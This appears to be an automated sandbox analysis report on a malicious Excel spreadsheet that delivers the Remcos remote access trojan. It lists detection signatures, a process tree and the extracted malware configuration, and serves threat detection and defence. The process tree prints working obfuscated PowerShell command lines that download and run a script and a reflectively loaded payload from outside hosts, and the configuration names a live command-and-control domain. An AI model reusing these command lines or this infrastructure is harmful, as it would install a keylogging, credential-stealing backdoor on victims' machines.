Windows
Analysis Report
0001.xls
Overview
General Information
Detection
Remcos
Metric | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3560 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3824 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- powershell.exe (PID: 3932 cmdline:
"C:\Window s\SYsTEm32 \wInDoWspo WERShell\V 1.0\POWeRS heLL.eXE" "poWERSHel L.exe -EX by PAss - NOp -w 1 -C DE VicEcREdeN TiaLDEpLoy MENt.Exe ; i ex($(IEx(' [syStem.Te XT.eNcOdIn G]'+[chAR] 58+[chAr]5 8+'UtF8.Ge tstRiNg([s YstEm.conV Ert]'+[cHA R]58+[ChAr ]58+'FrOMb ASE64stRIn G('+[CHAR] 34+'JFRYOH MgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC A9ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgYURELVR5 UGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtbWVtYm VSRGVGSU5p VGlvTiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVckxtb0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBo TXR3U0FMLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGlX RlFYWCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBsV05u V1BtU3Vacy x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgSURN ekQsSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgR0NERFpy TkJNeXUpOy cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTmFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJh dUdtbnpkWi IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFtRVNQ YWNFICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgS3NJQ3 lpZlhzeEkg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJFRYOHM6 OlVSTERvd2 5sb2FkVG9G aWxlKDAsIm h0dHA6Ly8x OTIuMy4xMD EuMjEvNDEy L3NlZXRoZW Jlc3R0aGlu Z3NnaXZpbm dyZW5lcmd5 dG9teWVudG lyZWxpZmVm b3JnZXRoZX JiYWNrLnRJ RiIsIiRFTn Y6QVBQREFU QVxzZWV0aG ViZXN0dGhp bmdzZ2l2aW 5ncmVuZXJn eXRvbXllbn RpcmVsaWZl Zm9yZ2V0aC 5WQnMiLDAs MCk7U3RBUn Qtc2xlZXAo Myk7c3RBUl QgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiJGVuVjpB UFBEQVRBXH NlZXRoZWJl c3R0aGluZ3 NnaXZpbmdy ZW5lcmd5dG 9teWVudGly ZWxpZmVmb3 JnZXRoLlZC cyI='+[cHA r]0x22+')) ')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 4028 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7781.tmp" "c:\Users\user\AppData\Local\Temp\htcuymda\CSCED218374D5764718ADCDD459E0E116EB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- AcroRd32.exe (PID: 2960 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
- mshta.exe (PID: 3052 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- powershell.exe (PID: 808 cmdline:
"C:\Window s\SYsTEm32 \wInDoWspo WERShell\V 1.0\POWeRS heLL.eXE" "poWERSHel L.exe -EX by PAss - NOp -w 1 -C DE VicEcREdeN TiaLDEpLoy MENt.Exe ; i ex($(IEx(' [syStem.Te XT.eNcOdIn G]'+[chAR] 58+[chAr]5 8+'UtF8.Ge tstRiNg([s YstEm.conV Ert]'+[cHA R]58+[ChAr ]58+'FrOMb ASE64stRIn G('+[CHAR] 34+'JFRYOH MgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC A9ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgYURELVR5 UGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtbWVtYm VSRGVGSU5p VGlvTiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVckxtb0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBo TXR3U0FMLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGlX RlFYWCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBsV05u V1BtU3Vacy x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgSURN ekQsSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgR0NERFpy TkJNeXUpOy cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTmFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJh dUdtbnpkWi IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFtRVNQ YWNFICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgS3NJQ3 lpZlhzeEkg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJFRYOHM6 OlVSTERvd2 5sb2FkVG9G aWxlKDAsIm h0dHA6Ly8x OTIuMy4xMD EuMjEvNDEy L3NlZXRoZW Jlc3R0aGlu Z3NnaXZpbm dyZW5lcmd5 dG9teWVudG lyZWxpZmVm b3JnZXRoZX JiYWNrLnRJ RiIsIiRFTn Y6QVBQREFU QVxzZWV0aG ViZXN0dGhp bmdzZ2l2aW 5ncmVuZXJn eXRvbXllbn RpcmVsaWZl Zm9yZ2V0aC 5WQnMiLDAs MCk7U3RBUn Qtc2xlZXAo Myk7c3RBUl QgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiJGVuVjpB UFBEQVRBXH NlZXRoZWJl c3R0aGluZ3 NnaXZpbmdy ZW5lcmd5dG 9teWVudGly ZWxpZmVmb3 JnZXRoLlZC cyI='+[cHA r]0x22+')) ')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 1568 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3612 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3624 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6F7.tmp" "c:\Users\user\AppData\Local\Temp\1vm3e1kt\CSC4B568FC3E3A64456AB5664CB529ACC2C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3876 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 3856 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JigoR2VULV ZBUmlhQmxF ICcqbURSKi cpLk5BTUVb MywxMSwyXS 1KT0luJycp KCAoKCc3Jy snVk1pbWFn ZVVybCA9IH ptd2h0dHBz Oi8vZHJpdm UuJysnZ29v Z2xlLmNvbS 91Yz9leHBv cnQ9ZG93bm xvYWQmaWQ9 MUFJVmdKSk p2MUY2dlM0 c1VPeWJuSC 1zRHZVaEJZ d3VyIHptdz s3Vk13ZWJD bGknKydlbn QgPSBOZXct T2JqZWN0Jy snIFN5c3Rl bS5OZXQuV2 ViQ2xpZW50 OzdWTWknKy dtYWdlQnl0 ZXMgPSA3Vk 13ZWJDbGll bnQuRG93bm xvYWREYXRh KDdWTWltYW dlVXJsKTs3 Vk1pbWFnZV RleHQgPSAn KydbU3lzdG VtLlRleHQu RW5jb2Rpbm ddOjpVVCcr J0YnKyc4Lk dldFN0cmlu Zyg3Vk1pbW FnZUJ5dGVz KTs3Vk1zdG FydEZsYWcg PSB6bXc8PE JBUycrJ0U2 NF9TVEFSVD 4+em13OzdW TWVuZEZsYW cgPSB6bXc8 PEJBU0U2Jy snNF9FTkQ+ Pnptdzs3Vk 1zdGFydElu JysnZGV4ID 0gNycrJ1ZN aW1hZ2VUZX h0LkluZGV4 T2YoN1ZNc3 RhcnRGbGFn KTs3Vk1lbm RJbmRleCA9 IDdWTWltYW cnKydlVGV4 dC5JbmRleE 9mKDdWTWVu ZEZsYWcpOz dWTXN0Jysn YXJ0SW5kZX ggLScrJ2dl IDAgLWFuZC A3Vk1lbmRJ bmQnKydleC AtZ3QgN1ZN c3RhcnRJbm RleCcrJzs3 Vk1zdGFydE luZGV4ICs9 IDdWTXN0YX J0RmxhZy5M ZW5ndGg7N1 ZNJysnYmFz ZTY0TGVuZ3 RoID0gJysn NycrJ1ZNZW 5kSW5kZXgg LSA3VicrJ0 1zdGEnKydy dEluZGV4Oz dWTWJhc2U2 NENvbW1hbm QgPSA3Vk1p bWFnZVRleH QuU3ViJysn c3RyaW5nKD dWTXN0YXJ0 SW5kZXgsID dWTWJhc2U2 NExlbmd0aC k7N1ZNJysn YmFzZTY0Um V2ZXJzZWQg PSAtam9pbi AoN1YnKydN YicrJ2FzZT Y0Q29tbWFu ZC5Ub0NoYX JBcnJheSgp IHJwOCBGb3 JFYWNoLU9i amVjdCB7ID dWTV8gfSlb LTEuLi0oN1 ZNYmEnKydz ZTY0Q29tbW FuZC5MZW5n dGgpXTs3Vk 1jb21tYW5k Qnl0ZXMgPS BbU3lzdGVt LkNvbnZlcn RdOjpGcm8n KydtQmFzZT Y0U3RyaW5n KDdWTWJhc2 U2NFJldmVy cycrJ2VkKT s3Vk0nKyds b2FkZWRBc3 NlbWJseSA9 IFtTeXN0ZW 0uUmVmbGVj dGlvbi5Bc3 NlbWJseV06 OkxvYWQoN1 ZNY29tbWFu ZEJ5dGVzKT s3Vk12YWlN ZXRob2QgPS BbZG5saWIu SU8uSG9tZV 0uR2V0TWV0 aG9kKHptd1 ZBSXptdyk7 N1ZNdmFpTW V0aG9kLklu dm9rZSg3Vk 1udWxsLCAn KydAKHptd3 R4dC5UVFIn KydDTUxMLz IxNC8xMi4x JysnMDEuMy 4yOTEvLzpw dHRoem13LC B6bXdkZXNh dGl2YWRvem 13LCB6bXdk ZXNhdGl2YS crJ2Rvem13 LCB6bXdkZX NhdGl2YWRv em13LCB6bX dDYXNQb2x6 bXcsIHptd2 Rlc2F0aXZh ZCcrJ296bX csIHptd2Rl c2F0aXZhZG 
96bXcsem13 ZGVzYXRpdm Fkb3ptdyx6 bXdkZXNhdG l2YWRvem13 LHptd2Rlc2 F0aXYnKydh ZG96bXcsem 13ZGVzYXRp dmFkb3ptdy x6bXdkZXNh dGl2JysnYW RveicrJ213 LHptdzF6bX csem13ZGVz YXRpdmFkb3 ptdykpOycp ICAtckVQbE FDZSAncnA4 JyxbQ0hhcl 0xMjQgIC1j cmVQbGFDRS AgKFtDSGFy XTEyMitbQ0 hhcl0xMDkr W0NIYXJdMT E5KSxbQ0hh cl0zOS1jcm VQbGFDRShb Q0hhcl01NS tbQ0hhcl04 NitbQ0hhcl 03NyksW0NI YXJdMzYpKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3776 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "&((Ge T-VARiaBlE '*mDR*'). NAME[3,11, 2]-JOIn'') ( (('7'+'V MimageUrl = zmwhttps ://drive.' +'google.c om/uc?expo rt=downloa d&id=1AIVg JJJv1F6vS4 sUOybnH-sD vUhBYwur z mw;7VMwebC li'+'ent = New-Objec t'+' Syste m.Net.WebC lient;7VMi '+'mageByt es = 7VMwe bClient.Do wnloadData (7VMimageU rl);7VMima geText = ' +'[System. Text.Encod ing]::UT'+ 'F'+'8.Get String(7VM imageBytes );7VMstart Flag = zmw <<BAS'+'E6 4_START>>z mw;7VMendF lag = zmw< <BASE6'+'4 _END>>zmw; 7VMstartIn '+'dex = 7 '+'VMimage Text.Index Of(7VMstar tFlag);7VM endIndex = 7VMimag'+ 'eText.Ind exOf(7VMen dFlag);7VM st'+'artIn dex -'+'ge 0 -and 7V MendInd'+' ex -gt 7VM startIndex '+';7VMsta rtIndex += 7VMstartF lag.Length ;7VM'+'bas e64Length = '+'7'+'V MendIndex - 7V'+'Mst a'+'rtInde x;7VMbase6 4Command = 7VMimageT ext.Sub'+' string(7VM startIndex , 7VMbase6 4Length);7 VM'+'base6 4Reversed = -join (7 V'+'Mb'+'a se64Comman d.ToCharAr ray() rp8 ForEach-Ob ject { 7VM _ })[-1..- (7VMba'+'s e64Command .Length)]; 7VMcommand Bytes = [S ystem.Conv ert]::Fro' +'mBase64S tring(7VMb ase64Rever s'+'ed);7V M'+'loaded Assembly = [System.R eflection. Assembly]: :Load(7VMc ommandByte s);7VMvaiM ethod = [d nlib.IO.Ho me].GetMet hod(zmwVAI zmw);7VMva iMethod.In voke(7VMnu ll, '+'@(z mwtxt.TTR' +'CMLL/214 /12.1'+'01 .3.291//:p tthzmw, zm wdesativad ozmw, zmwd esativa'+' dozmw, zmw desativado zmw, zmwCa sPolzmw, z mwdesativa d'+'ozmw, zmwdesativ adozmw,zmw desativado zmw,zmwdes ativadozmw ,zmwdesati v'+'adozmw ,zmwdesati vadozmw,zm wdesativ'+ 'adoz'+'mw ,zmw1zmw,z mwdesativa dozmw));') -rEPlACe 'rp8',[CHa r]124 -cre PlaCE ([CH ar]122+[CH ar]109+[CH ar]119),[C Har]39-cre PlaCE([CHa r]55+[CHar ]86+[CHar] 77),[CHar] 36))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - CasPol.exe (PID: 3280 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\mpqqyenbumlfhmiakqc" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wjwiyxyvivdsjteetbolyxd" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\hljbzpjxwdvxtzshkmjmbbyzqg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["cokka.duckdns.org:9764:1", "cokka.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TTZ00A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | | |
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
System Summary
Source | Author |
---|---|
| Florian Roth (Nextron Systems) |